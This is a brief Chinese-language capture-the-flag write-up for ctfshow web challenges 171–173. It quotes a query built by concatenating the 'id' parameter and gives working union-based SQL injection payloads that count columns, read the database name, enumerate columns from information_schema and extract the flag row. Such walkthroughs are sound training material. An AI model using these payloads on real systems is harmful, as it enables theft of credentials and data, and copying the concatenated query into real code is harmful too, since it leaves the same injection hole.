Web171 1

在题目中可以看到查询语句为 "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";

直接使用万能密码 查到了所有用户 获得flag

Web172 0

可以看到返回逻辑显示 如果返回的查询数据中username不等于flag 则才会返回结果

先用1 ' order by 2 --+ 查出这个表有两列

再用-1' union select 1,(database()) --+查出数据库名

用union注入查出它的列名 id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='ctfshow_user2') --+ 

用concat合并字段查到flag id=-1' union select 1,(select concat(username,password) from ctfshow_user2 where username='flag') --+ 

Web173 0

先用  1‘ order by 3 --+ 查出这个表有三列

直接用-1' union select 1,2,password from ctfshow_user3 where username='flag' -- +查出flag